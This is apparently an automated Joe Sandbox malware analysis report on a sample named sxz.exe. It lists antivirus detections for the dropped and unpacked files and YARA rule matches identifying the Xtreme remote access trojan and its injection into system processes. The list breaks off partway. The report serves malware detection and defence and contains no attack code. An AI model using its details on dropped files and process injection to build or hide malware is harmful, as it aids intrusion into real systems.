Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:22.0.0
Analysis ID:546427
Start time:10:09:44
Joe Sandbox Product:Cloud
Start date:03.05.2018
Overall analysis duration:0h 15m 51s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:sxz.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:41
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.evad.expl.spyw.troj.winEXE@61/225@34/1
HCA Information:Failed
EGA Information:
  • Successful, ratio: 71.4%
HDC Information:
  • Successful, ratio: 66.1% (good quality ratio 64.6%)
  • Quality average: 82.3%
  • Quality standard deviation: 25.4%
Cookbook Comments:
  • Adjust boot time
  • Correcting counters for adjusted boot time
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): conhost.exe, WMIADAP.exe, dllhost.exe
  • Execution Graph export aborted for target explorer.exe, PID 3960 because there are no executed function
  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryDirectoryFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
  • Report size getting too big, too many NtReadFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: sxz.exe, javaw.exe, java.exe

Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook



Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for dropped fileShow sources
Source: C:\Users\user~1\AppData\Local\Temp\358saxio.exeAvira: Label: DR/Delphi.svunx
Source: C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbsAvira: Label: VBS/Agent.281
Source: C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbsAvira: Label: VBS/Agent.276
Source: C:\Users\user\AppData\Roaming\Microsoft\Skype.exeAvira: Label: DR/Delphi.svunx
Source: C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbsAvira: Label: VBS/Agent.281
Source: C:\Users\user~1\AppData\Local\Temp\server.exeAvira: Label: TR/Spy.59904216
Source: C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbsAvira: Label: VBS/Agent.276
Antivirus detection for submitted fileShow sources
Source: sxz.exeAvira: Label: DR/Delphi.wqtni
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user~1\AppData\Local\Temp\358saxio.exevirustotal: Detection: 48%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: sxz.exevirustotal: Detection: 43%Perma Link
Antivirus detection for unpacked fileShow sources
Source: 19.1.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 27.1.Server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 5.2.svchost.exe.c80000.6.unpackAvira: Label: TR/Spy.59904216
Source: 3.2.server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 2.1.sxz.exe.400000.0.unpackAvira: Label: DR/Injector.toian
Source: 35.2.358saxio.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 27.2.Server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 19.0.358saxio.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.server.exe.c80000.2.unpackAvira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 6.2.iexplore.exe.c80000.2.unpackAvira: Label: TR/Spy.59904216
Source: 35.1.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.iexplore.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 12.2.358saxio.exe.23c0000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.1.unpackAvira: Label: DR/Injector.toian
Source: 19.2.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 14.1.explorer.exe.1b80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 1.2.sxz.exe.1a40000.3.unpackAvira: Label: DR/Injector.toian
Source: 35.2.358saxio.exe.1440000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 3.0.server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 15.1.Server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 1.0.sxz.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 14.1.explorer.exe.1b80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 27.0.Server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 5.0.svchost.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 27.0.Server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.2.unpackAvira: Label: TR/Spy.59904216
Source: 2.2.sxz.exe.400000.2.unpackAvira: Label: DR/Injector.toian
Source: 19.0.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 15.2.Server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 12.2.358saxio.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.3.unpackAvira: Label: DR/Injector.toian
Source: 2.0.sxz.exe.400000.2.unpackAvira: Label: DR/Injector.toian
Source: 34.0.iexplore.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 15.0.Server.exe.c80000.3.unpackAvira: Label: TR/Spy.59904216
Source: 3.0.server.exe.c80000.3.unpackAvira: Label: TR/Spy.59904216
Source: 34.2.iexplore.exe.c80000.2.unpackAvira: Label: TR/Spy.59904216
Source: 27.0.Server.exe.c80000.3.unpackAvira: Label: TR/Spy.59904216
Source: 3.0.server.exe.c80000.1.unpackAvira: Label: TR/Spy.59904216
Source: 2.0.sxz.exe.400000.5.unpackAvira: Label: DR/Injector.toian
Source: 5.2.svchost.exe.290000.1.unpackAvira: Label: TR/Spy.59904216
Source: 1.2.sxz.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 12.0.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 27.0.Server.exe.c80000.2.unpackAvira: Label: TR/Spy.59904216
Source: 12.0.358saxio.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 3.1.server.exe.c80000.0.unpackAvira: Label: TR/Spy.59904216
Source: 35.0.358saxio.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.4.unpackAvira: Label: DR/Injector.toian
Source: 19.0.358saxio.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 35.0.358saxio.exe.400000.3.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.1.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.sxz.exe.400000.0.unpackAvira: Label: DR/Injector.toian
Source: 1.1.sxz.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 19.0.358saxio.exe.400000.2.unpackAvira: Label: TR/Crypt.XPACK.Gen
Source: 12.1.358saxio.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen
Yara signature matchShow sources
Source: 00000003.00000000.14905165956.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14937698570.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000002.14989895202.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.15000788791.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14932929795.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000022.00000000.15012281235.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000022.00000000.15012281235.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000001.14905808954.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000E.00000001.14937243423.01B81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000002.14987723130.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000001.15007151931.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.15001441864.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000005.00000002.15179880413.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000005.00000002.15179880413.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.14999659592.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000006.00000002.14955870384.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000006.00000002.14955870384.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14944848932.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000005.00000002.15177862719.00290000.00000004.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000005.00000002.15177862719.00290000.00000004.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000000.14950318636.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000F.00000001.14957378618.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000006.00000000.14913253676.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000006.00000000.14913253676.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000000.14904035142.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000000E.00000001.14936774837.01B81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000002.15035469105.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000000.14905430148.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000003.00000000.14904944731.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000005.00000000.14909911900.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000005.00000000.14909911900.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 0000001B.00000000.15004091676.00C81000.00000020.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 00000022.00000002.15021754459.00C80000.00000040.sdmp, type: MEMORYMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 00000022.00000002.15021754459.00C80000.00000040.sdmp, type: MEMORYMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: C:\Windows\InstallDir\Server.exe, type: DROPPEDMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: C:\Windows\InstallDir\Server.exe, type: DROPPEDMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: C:\Users\user~1\AppData\Local\Temp\server.exe, type: DROPPEDMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: C:\Users\user~1\AppData\Local\Temp\server.exe, type: DROPPEDMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 34.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 34.0.iexplore.exe.c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.1.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.1.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.2.server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.2.server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.0.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.0.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.c80000.6.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.c80000.6.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.0.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 15.0.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 6.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 6.0.iexplore.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 27.2.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 27.2.Server.exe.c80000.1.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 6.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 6.2.iexplore.exe.c80000.2.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 5.2.svchost.exe.c80000.6.raw.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 5.2.svchost.exe.c80000.6.raw.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 14.1.explorer.exe.1b80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 14.1.explorer.exe.1b80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 3.0.server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
Source: 3.0.server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: RAT_Xtreme author = Kevin Breen <kevin@techanarchy.net>, reference = http://malwareconfig.com/stats/Xtreme, maltype = Remote Access Trojan, description = Detects Xtreme RAT, date = 2014/04, ver = 2.9, 3.1, 3.2, 3.5, filetype = exe
Source: 15.1.Server.exe.c80000.0.unpack, type: UNPACKEDPEMatched rule: Xtreme_Sep17_1 author = Florian Roth, reference = Internal Research, description = Detects XTREME sample analyzed in September 2017, date = 2017-09-27, hash1 = 93c89044e8850721d39e935acd3fb693de154b7580d62ed460256cabb75599a6
